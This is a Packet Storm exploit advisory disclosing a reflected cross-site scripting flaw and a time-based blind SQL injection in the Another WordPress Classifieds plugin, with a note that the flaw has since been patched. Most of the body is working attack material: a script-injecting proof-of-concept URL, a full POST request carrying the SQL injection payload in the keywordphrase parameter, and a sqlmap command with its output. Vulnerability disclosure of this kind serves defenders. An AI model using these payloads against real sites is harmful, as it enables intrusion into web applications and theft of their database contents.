exploit the possibilities

Another WordPress Classifieds Cross Site Scripting / SQL Injection

Another WordPress Classifieds Cross Site Scripting / SQL Injection
Posted Nov 8, 2014
Authored by dill

Another WordPress Classifieds plugin suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 9c8da095aa11362c724b6c21fad8b1d9

Another WordPress Classifieds Cross Site Scripting / SQL Injection

Change Mirror Download
Exploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting  
Author: dill
download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client
Webpage: http://awpcp.com/

Issue number 1: Cross-site scripting (reflective)

Details:
An arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute and then encapsulated in double quotation marks. This is then echoed in the applications response.

Proof-of-Concept (PoC):
http://vulnerable.server/?page_id=16587&step=send-access-key&a40f8%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E76975=1

Issue number 2: SQL injection
Details:
The parameter “keywordphrase” is susceptible to a time-based blind SQL injection when doing a search for classifieds.

Proof-of-Concept (PoC)
Request:
POST /?page_id=16592 HTTP/1.1
Host: vulnerable.server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://vulnerable.server/?page_id=16592
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country&regions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state&regions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city&regions[0][city]=city

Exploit through sqlmap:
Copy post request to text file
sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5

-----------------
Place: POST
Parameter: keywordphrase
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country&regions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State&regions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City&regions[0][city]=City

Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin



Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close